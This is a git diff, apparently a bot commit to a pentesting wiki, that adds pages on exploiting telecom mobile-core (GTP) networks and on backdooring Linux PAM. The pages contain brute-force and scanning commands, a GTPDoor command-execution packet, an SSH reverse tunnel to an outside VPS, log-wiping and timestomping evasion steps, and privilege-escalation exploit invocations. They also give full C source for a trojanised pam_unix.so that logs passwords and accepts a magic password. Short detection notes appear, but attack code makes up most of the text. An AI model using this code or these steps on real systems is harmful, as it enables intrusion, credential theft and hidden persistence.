Add content from: The Covert Operator's Playbook: Infiltration of Global Telec...

HackTricks News Bot · HackTricks News Bot · commit ab7951e06999 · 2025-07-30T01:39:09.000Z
diff --git a/src/SUMMARY.md b/src/SUMMARY.md
@@ -21,6 +21,7 @@
   - [Network Protocols Explained (ESP)](generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md)
   - [Nmap Summary (ESP)](generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md)
   - [Pentesting IPv6](generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md)
+  - [Telecom Network Exploitation](generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md)
   - [WebRTC DoS](generic-methodologies-and-resources/pentesting-network/webrtc-dos.md)
   - [Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks](generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
   - [Spoofing SSDP and UPnP Devices with EvilSSDP](generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md)
diff --git a/src/generic-methodologies-and-resources/pentesting-network/README.md b/src/generic-methodologies-and-resources/pentesting-network/README.md
@@ -890,6 +890,13 @@ Bettercap broadcast SSDP packets searching for all kind of services (UDP Port 19
 
 Bettercap broadcast WSD packets searching for services (UDP Port 3702).
 
+
+### Telecom / Mobile-Core (GTP) Exploitation
+
+{{#ref}}
+telecom-network-exploitation.md
+{{#endref}}
+
 ## References
 
 - [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
diff --git a/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md b/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md
@@ -0,0 +1,157 @@
+# Telecom Network Exploitation (GTP / Roaming Environments)
+
+{{#include ../../banners/hacktricks-training.md}}
+
+> [!NOTE]
+> Mobile-core protocols (GPRS Tunnelling Protocol – GTP) often traverse semi-trusted GRX/IPX roaming backbones.  Because they ride on plain UDP with almost no authentication, **any foothold inside a telecom perimeter can usually reach core signalling planes directly**.  The following notes collect offensive tricks observed in the wild against SGSN/GGSN, PGW/SGW and other EPC nodes.
+
+## 1. Recon & Initial Access
+
+### 1.1  Default OSS / NE Accounts
+A surprisingly large set of vendor network elements ship with hard-coded SSH/Telnet users such as `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, …  A dedicated wordlist dramatically increases brute-force success:
+
+```bash
+hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt
+```
+
+If the device exposes only a management VRF, pivot through a jump host first (see section «SGSN Emu Tunnel» below).
+
+### 1.2  Host Discovery inside GRX/IPX
+Most GRX operators still allow **ICMP echo** across the backbone.  Combine `masscan` with the built-in `gtpv1` UDP probes to quickly map GTP-C listeners:
+
+```bash
+masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55
+```
+
+## 2. Enumerating Subscribers – `cordscan`
+
+The following Go tool crafts **GTP-C Create PDP Context Request** packets and logs the responses.  Each reply reveals the current **SGSN / MME** serving the queried IMSI and, sometimes, the subscriber’s visited PLMN.
+
+```bash
+# Build
+GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan
+
+# Usage (typical):
+./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap
+```
+Key flags:
+- `--imsi` Target subscriber IMSI
+- `--oper` Home / HNI (MCC+MNC)
+- `-w`      Write raw packets to pcap
+
+Important constants inside the binary can be patched to widen scans:
+
+```
+pingtimeout       = 3   // seconds before giving up
+pco               = 0x218080
+common_tcp_ports  = "22,23,80,443,8080"
+```
+
+## 3. Code Execution over GTP – `GTPDoor`
+
+`GTPDoor` is a tiny ELF service that **binds UDP 2123 and parses every incoming GTP-C packet**.  When the payload starts with a pre-shared tag, the remainder is decrypted (AES-128-CBC) and executed via `/bin/sh -c`.  The stdout/stderr are exfiltrated inside **Echo Response** messages so that no outward session is ever created.
+
+Minimal PoC packet (Python):
+
+```python
+import gtpc, Crypto.Cipher.AES as AES
+key = b"SixteenByteKey!"
+cmd = b"id;uname -a"
+enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00"))
+print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))
+```
+
+Detection:
+* any host sending **unbalanced Echo Requests** to SGSN IPs
+* GTP version flag set to 1 while message type = 1 (Echo) – deviation from spec
+
+## 4. Pivoting Through the Core
+
+### 4.1  `sgsnemu` + SOCKS5
+`OsmoGGSN` ships an SGSN emulator able to **establish a PDP context towards a real GGSN/PGW**.  Once negotiated, Linux receives a new `tun0` interface reachable from the roaming peer.
+
+```bash
+sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
+       -APN internet -c 1 -d
+ip route add 172.16.0.0/12 dev tun0
+microsocks -p 1080 &   # internal SOCKS proxy
+```
+
+With proper firewall hair-pinning, this tunnel bypasses signalling-only VLANs and lands you directly in the **data plane**.
+
+### 4.2  SSH Reverse Tunnel over Port 53
+DNS is almost always open in roaming infrastructures.  Expose an internal SSH service to your VPS listening on :53 and return later from home:
+
+```bash
+ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com
+```
+Check that `GatewayPorts yes` is enabled on the VPS.
+
+## 5. Covert Channels
+
+| Channel | Transport | Decoding | Notes |
+|---------|-----------|----------|-------|
+| ICMP – `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | pure passive listener, no outbound traffic |
+| DNS – `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) encoded in A-record octets | watches for `*.nodep` sub-___domain |
+| GTP – `GTPDoor` | UDP 2123 | AES-128-CBC blob in private IE | blends with legitimate GTP-C chatter |
+
+All implants implement watchdogs that **timestomp** their binaries and re-spawn if crashed.
+
+## 6. Defense Evasion Cheatsheet
+
+```bash
+# Remove attacker IPs from wtmp
+utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp
+
+# Disable bash history
+export HISTFILE=/dev/null
+
+# Masquerade as kernel thread
+echo 0 > /proc/$$/autogroup   # hide from top/htop
+printf '\0' > /proc/$$/comm    # appears as [kworker/1]
+
+touch -r /usr/bin/time /usr/bin/chargen   # timestomp
+setenforce 0                              # disable SELinux
+```
+
+## 7. Privilege Escalation on Legacy NE
+
+```bash
+# DirtyCow – CVE-2016-5195
+gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd
+
+# PwnKit – CVE-2021-4034
+python3 PwnKit.py
+
+# Sudo Baron Samedit – CVE-2021-3156
+python3 exploit_userspec.py
+```
+
+Clean-up tip:
+```bash
+userdel firefart 2>/dev/null
+rm -f /tmp/sh ; history -c
+```
+
+## 8. Tool Box
+
+* `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` – custom tooling described in previous sections.
+* `FScan` : intranet TCP sweeps (`fscan -p 22,80,443 10.0.0.0/24`)
+* `Responder` : LLMNR/NBT-NS rogue WPAD
+* `Microsocks` + `ProxyChains` : lightweight SOCKS5 pivoting
+* `FRP` (≥0.37) : NAT traversal / asset bridging
+
+---
+## Detection Ideas
+1. **Any device other than an SGSN/GGSN establishing Create PDP Context Requests**.
+2. **Non-standard ports (53, 80, 443) receiving SSH handshakes** from internal IPs.
+3. **Frequent Echo Requests without corresponding Echo Responses** – might indicate GTPDoor beacons.
+4. **High rate of ICMP echo-reply traffic with large, non-zero identifier/sequence fields**.
+
+## References
+
+- [Palo Alto Unit42 – Infiltration of Global Telecom Networks](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/)
+- 3GPP TS 29.060 – GPRS Tunnelling Protocol (v16.4.0)
+- 3GPP TS 29.281 – GTPv2-C (v17.6.0)
+
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md b/src/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md
@@ -48,9 +48,67 @@ Controls dictate the module's response to success or failure, influencing the ov
 
 In a setup with multiple auth modules, the process follows a strict order. If the `pam_securetty` module finds the login terminal unauthorized, root logins are blocked, yet all modules are still processed due to its "required" status. The `pam_env` sets environment variables, potentially aiding in user experience. The `pam_ldap` and `pam_unix` modules work together to authenticate the user, with `pam_unix` attempting to use a previously supplied password, enhancing efficiency and flexibility in authentication methods.
 
+
+## Backdooring PAM – Hooking `pam_unix.so`
+
+A classic persistence trick in high-value Linux environments is to **swap the legitimate PAM library with a trojanised drop-in**.  Because every SSH / console login ends up calling `pam_unix.so:pam_sm_authenticate()`, a few lines of C are enough to capture credentials or implement a *magic* password bypass.
+
+### Compilation Cheatsheet
+```c
+#define _GNU_SOURCE
+#include <security/pam_modules.h>
+#include <dlfcn.h>
+#include <stdio.h>
+#include <fcntl.h>
+#include <unistd.h>
+
+static int (*orig)(pam_handle_t *, int, int, const char **);
+static const char *MAGIC = "Sup3rS3cret!";
+
+int pam_sm_authenticate(pam_handle_t *pamh, int flags, int argc, const char **argv) {
+    const char *user, *pass;
+    pam_get_user(pamh, &user, NULL);
+    pam_get_authtok(pamh, PAM_AUTHTOK, &pass, NULL);
+
+    /* Magic pwd → immediate success */
+    if(pass && strcmp(pass, MAGIC) == 0) return PAM_SUCCESS;
+
+    /* Credential harvesting */
+    int fd = open("/usr/bin/.dbus.log", O_WRONLY|O_APPEND|O_CREAT, 0600);
+    dprintf(fd, "%s:%s\n", user, pass);
+    close(fd);
+
+    /* Fall back to original function */
+    if(!orig) {
+        orig = dlsym(RTLD_NEXT, "pam_sm_authenticate");
+    }
+    return orig(pamh, flags, argc, argv);
+}
+```
+
+Compile and stealth-replace:
+```bash
+gcc -fPIC -shared -o pam_unix.so trojan_pam.c -ldl -lpam
+mv /lib/security/pam_unix.so /lib/security/pam_unix.so.bak
+mv pam_unix.so /lib/security/pam_unix.so
+chmod 644 /lib/security/pam_unix.so     # keep original perms
+touch -r /bin/ls /lib/security/pam_unix.so  # timestomp
+```
+
+### OpSec Tips
+1. **Atomic overwrite** – write to a temp file and `mv` into place to avoid half-written libraries that would lock out SSH.
+2. Log file placement such as `/usr/bin/.dbus.log` blends with legitimate desktop artefacts.
+3. Keep symbol exports identical (`pam_sm_setcred`, etc.) to avoid PAM mis-behaviour.
+
+### Detection
+* Compare MD5/SHA256 of `pam_unix.so` against distro package.
+* Check for world-writable or unusual ownership under `/lib/security/`.
+* `auditd` rule: `-w /lib/security/pam_unix.so -p wa -k pam-backdoor`.
+
 ### References
 
 - [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434)
+- [Palo Alto Unit42 – Infiltration of Global Telecom Networks](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/)
 
 {{#include ../../banners/hacktricks-training.md}}
 
